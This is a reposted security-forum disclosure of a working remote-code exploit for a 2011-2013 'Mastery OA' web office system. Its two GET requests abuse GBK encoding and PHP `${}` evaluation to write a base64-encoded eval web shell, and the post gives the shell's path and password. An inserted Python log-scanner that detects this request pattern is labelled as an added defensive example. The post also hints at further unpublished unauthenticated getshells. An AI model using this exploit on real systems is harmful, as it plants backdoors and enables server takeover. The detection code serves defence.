Mastery OA 2011-2013 universal GETSHELL - fixes / bug warning - Black Bar Safety Net

ID MYHACK58:62201337122
Type myhack58
Reporter Anonymous
Modified 2013-02-02T00:00:00


The program uses GBK encoding throughout, and that is its fatal weakness: basically 80% of its SQL statements can be controlled. However, because select and union are detected when data goes into the database, and because the program's encryption method is also very painful to deal with, injection is not considered here.

EXP:

The first step: [GET]http://site/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function. FUNC_ID=1%2 3% 2 0${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz5vaw))}

The second step: [GET]http://site/general/email/index.php

SHELL: http://site/general/email/shell.php password C
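A log-review check for the request shape shown in the first step, added here as an example and not part of the original post: it flags query parameters where a GBK lead byte takes a quote as its trail byte, or where `${` wraps a function call. The log lines, the `list.php` path, the `PLACEHOLDER` argument and the rule names are constructed for illustration, and reading `%d5'` as a lead-byte-before-quote pattern is an assumption about the request.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# `${ name(`: a PHP function call inside complex-variable syntax, as in the request above.
PHP_CALL = re.compile(rb"\$\{\s*[A-Za-z_]\w*\s*\(")

def dangling_lead_byte(value: bytes) -> bool:
    """True if a GBK lead byte (0x81-0xFE) takes a quote or backslash as its trail byte."""
    i = 0
    while i < len(value):
        if 0x81 <= value[i] <= 0xFE:      # lead byte: the next byte is consumed as its trail
            if value[i + 1:i + 2] in (b"'", b'"', b"\\"):
                return True
            i += 2
        else:
            i += 1
    return False

def inspect_request(target: str) -> list:
    """Return the names of the rules that any query parameter of `target` triggers."""
    hits = set()
    for part in urlsplit(target).query.split("&"):
        value = unquote_to_bytes(part.partition("=")[2])   # raw bytes, no charset decoding
        if dangling_lead_byte(value):
            hits.add("gbk-lead-byte-before-quote")
        if PHP_CALL.search(value):
            hits.add("php-call-in-dollar-brace")
    return sorted(hits)

def scan_log(lines):
    """Return (line number, rules) for every access-log line with at least one hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        rules = inspect_request(match.group(1)) if match else []
        if rules:
            findings.append((number, rules))
    return findings

# Constructed sample log lines (documentation addresses, placeholder payload).
SAMPLE_LOG = [
    '198.51.100.4 - - [02/Feb/2013:10:00:01 +0800] "GET /general/email/index.php HTTP/1.1" 200 1830',
    "203.0.113.7 - - [02/Feb/2013:10:00:05 +0800] \"GET /general/crm/studio/modules/EntityRelease/"
    "release.php?entity_name=1%d5'%20or%20x%23%20${%20fputs(fopen(PLACEHOLDER))} HTTP/1.1\" 200 97",
    '198.51.100.4 - - [02/Feb/2013:10:00:09 +0800] "GET /general/crm/list.php?name=%bf%cd%27 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, rules in scan_log(SAMPLE_LOG):
        print(number, rules)
```

The third sample line carries a complete two-byte character followed by a quote, which the byte walk does not flag; a plain "high byte before quote" regex would.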

The program's code is very chaotic; I do not know whether that is a result of the decryption or whether the programmers wrote it that way. There are also a few universal getshell issues that do not require login; they are not published here, to avoid large-scale damage.

Interested readers can read the code for themselves; they are very easy to find o(∩_∩)o ~~